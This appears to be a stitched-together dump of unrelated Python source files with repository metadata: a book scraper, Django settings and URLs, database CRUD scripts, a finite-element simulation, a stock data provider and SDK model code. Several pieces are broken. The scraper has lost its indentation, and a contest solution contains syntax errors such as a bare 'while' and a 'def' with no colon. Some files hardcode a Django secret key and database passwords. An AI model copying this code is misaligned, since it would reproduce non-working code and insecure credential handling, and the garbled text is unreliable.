#创建一个子弹对象,用于封装存放每一个记录的3个数据
dictbook={}
#获取每一个数据图书名称
lstTitle=regTitle.findall(blockcode)
print(lstTitle)
dictbook['title']=lstTitle
#获取每一本图书连接
lstLink=regLinks.findall(blockcode)
print(lstLink)
dictbook['link']=lstLink
#获取评分
lstRating=regRatings.findall(blockcode)
print(lstRating)
dictbook['rating']=lstRating
#获取书籍作者及价格
lstPrice=regprice.findall(blockcode)
print(lstPrice)
#封装好的字典数据添加到list列表中
data.append(dictbook)
print('='*30)
#设置json文件的存储路径
dataDir=os.path.join(os.getcwd(),'.vscode/模块编程/data')
if not os.path.exists(dataDir):
os.mkdir(dataDir)
#将数据写入json文件
with open(dataDir+os.sep+'bookdata.json','w',encoding='utf-8')as jsonfile:
#使用json中dump快速序列化并写入指定文件
json.dump(data,jsonfile,ensure_ascii=False)
print('>>>>json文件写入完毕')
|
[
"yonggang.suo@hotmail.com"
] |
yonggang.suo@hotmail.com
|
92208027272a6e16363b60e6e399cc6ec08fcbb5
|
f3d757f421497e19f2de0d3be21b9ae381511577
|
/phoneconfirmation/urls.py
|
57e758f3e36f49419e6051dbeed37811f6ed3296
|
[
"MIT"
] |
permissive
|
pinax/pinax-phone-confirmation
|
526ba350a5bbaaa58f229fad224cf9db41f5bcbc
|
102d997db0a7cc00bd862a94987338c25ba24f98
|
refs/heads/master
| 2023-06-22T15:57:32.364754
| 2019-04-11T23:59:58
| 2019-04-11T23:59:58
| 22,494,944
| 12
| 3
|
MIT
| 2019-04-11T23:46:54
| 2014-08-01T04:14:23
|
Python
|
UTF-8
|
Python
| false
| false
| 369
|
py
|
from django.conf.urls import url, patterns
urlpatterns = patterns(
"phoneconfirmation.views",
url(r"^$", "phone_list", name="phone_list"),
url(r"^confirm_phone/(\w+)/$", "confirm_phone", name="phone_confirm"),
url(r"^action/$", "action", name="phone_action"),
url(r"^get-country-for-code/$", "get_country_for_code", name="get_country_for_code")
)
|
[
"paltman@gmail.com"
] |
paltman@gmail.com
|
4450e3282bc9a86c113545d0d5972bb6830b3915
|
25176b716df2bd519703c6e3cbc761d1b8b192c1
|
/src/app/interfaces/redis.py
|
a5133a0dc8d716666dec6fb805c35b0bedf27523
|
[] |
no_license
|
kain-jy/python-clean-architecture
|
74521d411b1d53f007e80e74c8abe5c64591d321
|
a5365818026a6b4da47dae64b099c1de5c8b5005
|
refs/heads/master
| 2020-04-21T00:03:13.797032
| 2019-02-05T03:22:24
| 2019-02-05T03:24:26
| 169,184,834
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
import json
import redis
from .. import usecases
class UserRedisRepository(usecases.UserRepository):
def __init__(self, url):
self.client = redis.from_url(url, decode_responses=True)
def list_user(self):
ret = []
for k in self.client.keys('user:*'):
user = usecases.load_user(json.loads(self.client.get(k)))
ret.append(user)
return ret
def find_user(self, user_id):
payload = self.client.get('user:{}'.format(user_id))
if not payload:
return None
return usecases.load_user(json.loads(payload))
def upsert_user(self, user):
self.client.set("user:{}".format(user.id), json.dumps(user.dump()))
def delete_user(self, user):
self.client.delete("user:{}".format(user.id))
|
[
"me@kain-jy.com"
] |
me@kain-jy.com
|
87a8307caea5976b9dea43adb38dbb519f275bcd
|
3474b315da3cc5cb3f7823f19a18b63a8da6a526
|
/scratch/KRAMS/src/apps/scratch/jakub/nonlocal_averaging/2d_rotation.py
|
44dd801a3538e23552901d09a1db0e020abcbe31
|
[] |
no_license
|
h4ck3rm1k3/scratch
|
8df97462f696bc2be00f1e58232e1cd915f0fafd
|
0a114a41b0d1e9b2d68dbe7af7cf34db11512539
|
refs/heads/master
| 2021-01-21T15:31:38.718039
| 2013-09-19T10:48:24
| 2013-09-19T10:48:24
| 29,173,525
| 0
| 0
| null | 2015-01-13T04:58:57
| 2015-01-13T04:58:56
| null |
UTF-8
|
Python
| false
| false
| 5,857
|
py
|
from ibvpy.api import \
TStepper as TS, RTraceGraph, TLoop, \
TLine, BCDof, IBVPSolve as IS, DOTSEval, FEDomain, FERefinementGrid,\
FEGrid, BCSlice
from apps.scratch.jakub.mlab.mlab_trace import RTraceDomainListField
from ibvpy.mats.mats2D.mats2D_sdamage.mats2D_sdamage import MATS2DScalarDamage
from ibvpy.mats.mats2D.mats2D_elastic.mats2D_elastic import MATS2DElastic
from ibvpy.mats.mats2D.mats2D_sdamage.strain_norm2d import Euclidean, Mazars, Rankine
from ibvpy.fets.fets2D.fets2D4q import FETS2D4Q
from ibvpy.fets.fets2D.fets2D4q9u import FETS2D4Q9U
from ibvpy.fets.fets2D.fets2D4q8u import FETS2D4Q8U
from averaging import UniformDomainAveraging, LinearAF, QuarticAF
from numpy import array, cos, sin, pi,sqrt, deg2rad, arctan
from mathkit.mfn.mfn_line.mfn_line import MFnLineArray
from ibvpy.dots.avg_fn import AveragingFunction, LinearAF,QuarticAF
def app():
mp = MATS2DScalarDamage(E = 1.,
nu = 0.2,
epsilon_0 = 1.e-3,
epsilon_f = 5.e-3,
#stiffness = "algorithmic",
stress_state = "plane_strain",
stiffness = "secant",
strain_norm = Euclidean())
me = MATS2DElastic(E = 34e3,
nu = 0.,
stress_state = "plane_strain")
fets_eval = FETS2D4Q9U(mats_eval = me, ngp_r = 3, ngp_s = 3)
# Discretization
fe_domain = FEDomain()
fe_level1 = FERefinementGrid( domain = fe_domain,
fets_eval = fets_eval,
averaging = QuarticAF(radius = 0.25,
correction = True))
fe_grid = FEGrid( #coord_min = (-1.,-.5,0.),
coord_max = (2.,1.,0.),
shape = (20,10),
fets_eval = fets_eval,
level = fe_level1 )
mf = MFnLineArray( #xdata = arange(10),
ydata = array([0,1,1]) )
angle = 2.#[deg]
angle_r = deg2rad(angle)
s_angle = sin(angle_r/2.)
c_angle = cos(angle_r/2.)
l_diag = sqrt(5.)
d_angle = arctan(0.5)
s_diag = sin((angle_r+d_angle))
c_diag = cos((angle_r+d_angle))
ts = TS(sdomain = fe_domain,
# conversion to list (square brackets) is only necessary for slicing of
# single dofs, e.g "get_left_dofs()[0,1]" which elsewise retuns an integer only
bcond_list = [
# constraint for all left dofs in y-direction:
BCSlice(var='u', slice = fe_grid[0,0,0,0],dims=[0,1], value = 0.),
BCSlice(var='u', slice = fe_grid[-1,0,-1,0],dims=[1],
time_function = mf.get_value, value = 2*s_angle*2*c_angle),
BCSlice(var='u', slice = fe_grid[-1,0,-1,0],dims=[0],
time_function = mf.get_value, value = - 2*s_angle**2*2),
BCSlice(var='u', slice = fe_grid[0,-1,0,-1],dims=[0],
time_function = mf.get_value, value = - 1*s_angle*2*c_angle),
BCSlice(var='u', slice = fe_grid[0,-1,0,-1],dims=[1],
time_function = mf.get_value, value = - 1*s_angle**2*2),
BCSlice(var='u', slice = fe_grid[-1,-1,-1,-1],dims = [1],
time_function = mf.get_value, value = s_diag*l_diag - 1.),
BCSlice(var='u', slice = fe_grid[-1,-1,-1,-1],dims = [0],
time_function = mf.get_value, value = c_diag*l_diag - 2.)
],
rtrace_list = [
# RTraceGraph(name = 'Fi,right over u_right (iteration)' ,
# var_y = 'F_int', idx_y = right_dof,
# var_x = 'U_k', idx_x = right_dof,
# record_on = 'update'),
RTraceDomainListField(name = 'Deformation' ,
var = 'eps', idx = 0,
record_on = 'update'),
RTraceDomainListField(name = 'Displacement' ,
var = 'u', idx = 1,
record_on = 'update',
warp = True),
RTraceDomainListField(name = 'Damage' ,
var = 'omega', idx = 0,
record_on = 'update',
warp = True),
# RTraceDomainField(name = 'Stress' ,
# var = 'sig', idx = 0,
# record_on = 'update'),
# RTraceDomainField(name = 'N0' ,
# var = 'N_mtx', idx = 0,
# record_on = 'update')
]
)
# Add the time-loop control
#
tl = TLoop( tstepper = ts,
tolerance = 1.e-4,
tline = TLine( min = 0.0, step = 1., max = 2.0 ))
tl.eval()
# Put the whole stuff into the simulation-framework to map the
# individual pieces of definition into the user interface.
#
from ibvpy.plugins.ibvpy_app import IBVPyApp
ibvpy_app = IBVPyApp( ibv_resource = ts )
ibvpy_app.main()
if __name__ == '__main__':
app()
|
[
"Axel@Axel-Pc"
] |
Axel@Axel-Pc
|
8c5c25cee31f3dd1e619b8efc727a8ddf6ab0d55
|
0a3a67da5fe86829b61518827b104e82a887f8a9
|
/Create_Insert_Read_Update.py
|
fbe88c5990a7e7e04aad81215131e7f6927f9e75
|
[] |
no_license
|
heeba14/Database_Programing
|
080f50520bc24a1d3c1d8791614c90dc27ea449a
|
b995db179d3edf471429f7d7f0e465392534e02d
|
refs/heads/master
| 2021-04-29T22:53:36.891819
| 2018-02-24T18:09:29
| 2018-02-24T18:09:29
| 121,646,932
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,547
|
py
|
import pymysql
db = pymysql.connect("localhost", "root", "mysql123", "python")
"""Create Table"""
def create_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
#cursor.execute("DROP TABLE IF EXISTS EMPLOYEE")
sql = """CREATE TABLE Number (
FIRST_NAME TEXT NOT NULL,
LAST_NAME TEXT,
AGE INT )"""
cursor.execute(sql)
#db.close()
"""Insert Table"""
def insert_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
sql = """INSERT INTO Profile(FIRST_NAME,
LAST_NAME, AGE)
VALUES ('Heeba', 'Kawoosa', 24)"""
try:
cursor.execute(sql)
db.commit()
except:
db.rollback()
#db.close()
""" Read Table """
def read_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
sql = '''SELECT * FROM Profile'''
try:
cursor.execute(sql)
results = cursor.fetchall()
print(results)
except:
print("Error: unable to fetch data")
#db.close()
""" Update Table """
def update_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
sql = """UPDATE Profile SET AGE = AGE -1
WHERE First_name = 'Heeba'"""
try:
cursor.execute(sql)
db.commit()
except:
db.rollback()
#db.close()
create_table()
insert_table()
read_table()
update_table()
db.close()
|
[
"heebakawoos93@gmail.com"
] |
heebakawoos93@gmail.com
|
58bf50dfa1ff9df3fb85f9ea8137e332a7d6b16b
|
913874feee8362473286fd29a2697958d87098c0
|
/testcases/venv/bin/easy_install-3.6
|
6ed6ca7c2fd76d56fa7e9cf006bddac55cf0f8ef
|
[] |
no_license
|
Linestro/transpy
|
2a3d3c011ec746f23bdf5b4c93f1762cc5ac2ae5
|
ea1d93df8dd0c1fa77f0d1cbd34efe719d7a20f9
|
refs/heads/master
| 2020-05-25T00:37:49.305807
| 2019-05-17T19:43:06
| 2019-05-17T19:43:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 459
|
6
|
#!/home/hxzhu/Documents/sdh_mono-master/testcases/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.6')()
)
|
[
"hxzhu@umich.edu"
] |
hxzhu@umich.edu
|
7e5bdb95eceb8d543706dd352ce4101905da500f
|
95c71453ed6cc6f9b94f38a3c1655680618d71a4
|
/kickstart/DE/EC.py
|
477f7b6f874fc7fe1f0ee7f7bd160a909212de3b
|
[] |
no_license
|
ZX1209/gl-algorithm-practise
|
95f4d6627c1dbaf2b70be90149d897f003f9cb3a
|
dd0a1c92414e12d82053c3df981897e975063bb8
|
refs/heads/master
| 2020-05-16T14:56:34.568878
| 2019-12-27T07:37:11
| 2019-12-27T07:37:11
| 183,116,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
from collections import Counter
def isOdd(n):
return n % 2
def sortl(ls):
sums = Counter()
tmpl = []
for i in range(len(ls)):
sums[i] = sum(ls[i])
for i, j in sums.most_common():
tmpl.append(ls[i])
return tmpl
def rate(lhu,lla):
win = 0
total = 0
for hu in lhu:
for la in lla:
total += 1
if hu>la:
win+=1
return wi
def dfs()
# la win >=
# hu win >
def solve_EC(N, hu, la):
lla = [sum(la[i:i+N]) for i in range(N)]
win = 0
lla.sort()
hu.sort()
while
for i in range(3*N):
if hu[i] > la[i]:
win += 1
return win/(3*N)
def main():
T = int(input())
for t in range(T):
tmp = input().split()
tmp = list(map(int, tmp))
N, = tmp
tmp = input().split()
tmp = list(map(int, tmp))
hu = tmp
tmp = input().split()
tmp = list(map(int, tmp))
la = tmp
print('Case #' + str(t + 1) + ': ', end='')
print(solve_EC(N, hu, la))
if __name__ == '__main__':
main()
|
[
"1404919041@qq.com"
] |
1404919041@qq.com
|
4b7ffa1ba61b1b2c13a7c33cbe25688ed235e748
|
673e829dda9583c8dd2ac8d958ba1dc304bffeaf
|
/data/multilingual/Latn.BAX/Mono_16/pdf_to_json_test_Latn.BAX_Mono_16.py
|
419f2ec7b49e7c247dfa03dc2764cd5ebdafafec
|
[
"BSD-3-Clause"
] |
permissive
|
antoinecarme/pdf_to_json_tests
|
58bab9f6ba263531e69f793233ddc4d33b783b7e
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
refs/heads/master
| 2021-01-26T08:41:47.327804
| 2020-02-27T15:54:48
| 2020-02-27T15:54:48
| 243,359,934
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.BAX/Mono_16/udhr_Latn.BAX_Mono_16.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
20821475d51ca2148fae3ad69aa416f7dfa372ce
|
87cb949ba0e4159cf698280f241590442d1ea62b
|
/airflow_pipeline/extract_entities_debug.py
|
607b57a327608e2238f91ebac1d67a81d2d4d50c
|
[] |
no_license
|
ePlusPS/emr-workflow
|
000fea60563be659d4df266b873bea32713c1b9f
|
f894d353f647feb8c1ce30083d91d5e070b7d6c6
|
refs/heads/main
| 2023-08-10T07:48:35.904011
| 2020-08-21T00:32:12
| 2020-08-21T00:32:12
| 233,957,297
| 0
| 3
| null | 2023-07-25T15:11:32
| 2020-01-14T23:37:03
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 111
|
py
|
from create_entity_columns import extract_entities
extract_entities('asdf[B-MEDICATION] asdfasdf[B-FEATURE]')
|
[
"Morgan.Worthington@eplus.com"
] |
Morgan.Worthington@eplus.com
|
758db4b99719e367115109a9db0ff573624e2909
|
928e46c6f6553fe285645c3a61fb8b6ec1c27020
|
/website/website/settings.py
|
ff58740173b0a59efcb0ff5e9dbd86e52d7ae605
|
[] |
no_license
|
aureatemandala/The-Pavilion-of-Dreams
|
06ab1be2490639cd6f16022e8d76e449f290632f
|
7e3dcbabfc304500750273fb5cca5392d1416158
|
refs/heads/master
| 2022-12-31T10:41:36.345352
| 2020-10-25T13:51:38
| 2020-10-25T13:51:38
| 272,225,840
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,460
|
py
|
"""
Django settings for website project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'hws4725ktt-!ad#or+tw!h9jk0*gf9u45#07qb_id_56!@9lmy'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'dreams',
'ckeditor',
'ckeditor_uploader',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'website.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates').replace('\\','/')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'website.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'djdb',
'USER': 'nimrod',
'PASSWORD': '123456',
'HOST': '127.0.0.1',
'PORT': '3306'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR,'static')
#media
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
#配置ckeditor
CKEDITOR_UPLOAD_PATH = 'upload/'
|
[
"original_sin@163.com"
] |
original_sin@163.com
|
2a09d365cb4047774eb081599078201fca564efa
|
4d8cfbfe6498d0808eefa8983b07940e006c49fb
|
/ges/forms.py
|
7da85805e7e5201851422ce41a3674ddf51edaf3
|
[] |
no_license
|
nikolzp/ges_google
|
4b7d18e4fa039a0d4b21e5d71b2a249df958ed2b
|
fe89f150a624411867877491f127d71eff92bfc9
|
refs/heads/master
| 2020-03-12T00:59:24.072648
| 2018-04-20T14:43:38
| 2018-04-20T14:43:38
| 130,363,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
from django import forms
class GesFilterForm(forms.Form):
max_power = forms.IntegerField(label='Мощность от МВт', required=False)
min_power = forms.IntegerField(label='Мощность до МВт', required=False)
max_area = forms.IntegerField(label='Объем от кв.км', required=False)
min_area = forms.IntegerField(label='Объем до кв.км', required=False)
|
[
"nikolzp@gmail.com"
] |
nikolzp@gmail.com
|
95abb0d40ff2d7df34f470a31b6ed10e507c4cec
|
330e77e53d580a73e883e705b6bc8caca3456194
|
/accounts/views.py
|
611d57e964b7819e514d81af3de9be2323a30ba3
|
[] |
no_license
|
Chandan-97/CyTin
|
d2995970eade13ec46c7874ecb5c2922328e5367
|
e8612124a52a307a44c6833ddefe02b06a50c919
|
refs/heads/master
| 2020-03-10T11:39:18.188372
| 2018-04-13T04:26:01
| 2018-04-13T04:26:01
| 129,360,932
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,451
|
py
|
from django.shortcuts import render, redirect, HttpResponse
from django.contrib.auth import *
from .form import LoginForm, RegisterForm, RequestnewForm
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from .tokens import account_activation_token
import sendgrid
import os
from sendgrid.helpers.mail import *
# Create your views here.
def login_view(request):
form = LoginForm(request.POST or None)
# Getting Values from form and validation
if form.is_valid(): # clean() from forms.py is called
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
# print(username)
# print(password)
#user is available
user = authenticate(username=username, password=password)
login(request, user)
print (request.user.is_authenticated())
return redirect("/")
# Send it to render into page "login_form.html"
return render(request, "login_form.html", {"form" : form})
def logout_view(request):
logout(request)
print(request.user.is_authenticated())
return render(request, "login_form.html", {})
def requestnew_view(request):
user = request.user
if(user.is_authenticated() == False):
return redirect("/login")
form = RequestnewForm(request.POST or None)
if form.is_valid():
Software = form.save(commit=False)
Software.software = form.cleaned_data.get("Software")
if(form.cleaned_data.get("Version")):
Software.version = form.cleaned_data.get("Version")
if(form.cleaned_data.get("Comment")):
Software.comment = form.cleaned_data.get("Comment")
Software.save()
return render(request, "requestnew_form.html", {"form" : form})
def register_view(request):
print(request.user.is_authenticated())
form = RegisterForm(request.POST or None)
if form.is_valid():
user = form.save(commit=False)
password = form.cleaned_data.get("password")
user.set_password(password)
user.is_active = False
user.save()
current_site = get_current_site(request)
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
from_email = Email("iamoneofmykind@gmail.com")
to_email = Email(form.cleaned_data.get("email"))
subject = "Activate your CyTin account"
content = Content("text/plain", account_activation_token.make_token(user))
mail = Mail(from_email, subject, to_email, content)
response = sg.client.mail.send.post(request_body=mail.get())
return HttpResponse('Please confirm your email address to complete the registration')
else:
form = RegisterForm()
return render(request, "login_form.html", {"form":form})
# new_user = authenticate(username=user.username, password=user.password)
# login(request, user)
# print(request.user.is_authenticated())
# return redirect("/")
# return render(request, "login_form.html", {"form" : form})
def activate(request, uidb64, token):
try:
uid = force_text(urlsafe_base64_decode(uidb64))
user = User.objects.get(pk=uid)
except(TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and account_activation_token.check_token(user, token):
user.is_active = True
user.save()
login(request, user)
return HttpResponse('Thank you for your email confirmation. Now you can login your account.')
else:
return HttpResponse('Activation link is invalid!')
|
[
"cp564738@gmail.com"
] |
cp564738@gmail.com
|
236c4133d1ff95f11a4ce5df03a7b6a671f566ba
|
1ebf1d957e81555baade65fdb57041b914736f3b
|
/com/ddm/tradingbot/data/provider/yFinanceProvider.py
|
692210494e27557bbe045782244c9be7186fb79e
|
[] |
no_license
|
damenv/trabot
|
a777204d3459b86e01742db3d59f7ae2be43a283
|
08633722ba1a4a7fbbca162af9308f596196824f
|
refs/heads/master
| 2022-12-17T21:09:21.725391
| 2020-09-19T18:31:16
| 2020-09-19T18:31:16
| 290,363,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,069
|
py
|
"""
Using yfinance library to obtain the stock data
"""
import datetime as dt
import yfinance as yf
import pandas as pd
from com.ddm.tradingbot.data.provider.providerBase import providerBase
class yFinanceProvider(providerBase):
ticker = ""
valor = "yyyiii"
def __init__(self, ticker):
self.ticker = ticker
def getOHLCV(self, start_date, end_date) -> dict:
return yf.download(self.ticker, start_date, end_date)
def getOHLCV(self, ticker_list, start_date, end_date) -> dict:
ohlcv_data = {}
for ticker in ticker_list:
ohlcv_data[ticker] = yf.download(ticker, start_date, end_date)
def getClosePrice(self, start_date, end_date, interval) -> dict:
return yf.download(self.ticker, start_date, end_date)["Adj Close"]
def getClosePrice_list(self, ticker_list: list, start_date, end_date) -> dict:
close_price = pd.DataFrame()
for ticker in ticker_list:
close_price[ticker] = yf.download(ticker, start_date, end_date)["Adj Close"]
return close_price
|
[
"damen1105@gmail.com"
] |
damen1105@gmail.com
|
2180fbd40a9cda6cf6e7180218f7f525f2c351ce
|
664269ec1346b69b1af11d041d5352921ebef060
|
/sample-apps/rds/sample-app/src/pymysql/_compat.py
|
252789ec4460a3ee383f18f8af26e42ba82b666d
|
[
"Apache-2.0"
] |
permissive
|
awslabs/aws-servicebroker
|
0f288d4da0201a85e99f27bf7d95cc84d30d2f93
|
b28f42ad1e5861fd3009a10ad4bd511a384d3943
|
refs/heads/main
| 2023-08-30T01:09:05.351854
| 2023-07-06T18:09:22
| 2023-07-06T18:09:22
| 125,404,208
| 468
| 165
|
Apache-2.0
| 2023-08-30T14:07:12
| 2018-03-15T17:36:28
|
Python
|
UTF-8
|
Python
| false
| false
| 481
|
py
|
import sys
PY2 = sys.version_info[0] == 2
PYPY = hasattr(sys, 'pypy_translation_info')
JYTHON = sys.platform.startswith('java')
IRONPYTHON = sys.platform == 'cli'
CPYTHON = not PYPY and not JYTHON and not IRONPYTHON
if PY2:
import __builtin__
range_type = xrange
text_type = unicode
long_type = long
str_type = basestring
unichr = __builtin__.unichr
else:
range_type = range
text_type = str
long_type = int
str_type = str
unichr = chr
|
[
"jmmccon@amazon.com"
] |
jmmccon@amazon.com
|
bf1b684d24bbc4cf5a7179c2bf9f39cda4883aac
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-eihealth/huaweicloudsdkeihealth/v1/model/delete_nextflow_job_request.py
|
83b25425a82c6befc3917dc50bb320e6b8812723
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 4,327
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DeleteNextflowJobRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'eihealth_project_id': 'str',
'job_id': 'str'
}
attribute_map = {
'eihealth_project_id': 'eihealth_project_id',
'job_id': 'job_id'
}
def __init__(self, eihealth_project_id=None, job_id=None):
"""DeleteNextflowJobRequest
The model defined in huaweicloud sdk
:param eihealth_project_id: 医疗智能体平台项目ID,您可以在EIHealth平台单击所需的项目名称,进入项目设置页面查看。
:type eihealth_project_id: str
:param job_id: 作业id
:type job_id: str
"""
self._eihealth_project_id = None
self._job_id = None
self.discriminator = None
self.eihealth_project_id = eihealth_project_id
self.job_id = job_id
@property
def eihealth_project_id(self):
"""Gets the eihealth_project_id of this DeleteNextflowJobRequest.
医疗智能体平台项目ID,您可以在EIHealth平台单击所需的项目名称,进入项目设置页面查看。
:return: The eihealth_project_id of this DeleteNextflowJobRequest.
:rtype: str
"""
return self._eihealth_project_id
@eihealth_project_id.setter
def eihealth_project_id(self, eihealth_project_id):
"""Sets the eihealth_project_id of this DeleteNextflowJobRequest.
医疗智能体平台项目ID,您可以在EIHealth平台单击所需的项目名称,进入项目设置页面查看。
:param eihealth_project_id: The eihealth_project_id of this DeleteNextflowJobRequest.
:type eihealth_project_id: str
"""
self._eihealth_project_id = eihealth_project_id
@property
def job_id(self):
"""Gets the job_id of this DeleteNextflowJobRequest.
作业id
:return: The job_id of this DeleteNextflowJobRequest.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this DeleteNextflowJobRequest.
作业id
:param job_id: The job_id of this DeleteNextflowJobRequest.
:type job_id: str
"""
self._job_id = job_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeleteNextflowJobRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
0f0b988db044a90843787fcfa17790f226c36531
|
ce1f8877fa9ff084b75bceec4cc7ddf5b3153b07
|
/clif/testing/python/imported_methods_test.py
|
be75ee040777a7e9a8efe35837f737faf0fc1cda
|
[
"Apache-2.0"
] |
permissive
|
HenriChataing/clif
|
034aba392294ac30e40801815cf4d3172d3d44bd
|
307ac5b7957424706c598876d883936c245e2078
|
refs/heads/master
| 2021-01-23T16:25:19.543400
| 2017-09-01T22:18:03
| 2017-09-01T22:18:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 968
|
py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for clif.testing.python.imported_methods."""
import unittest
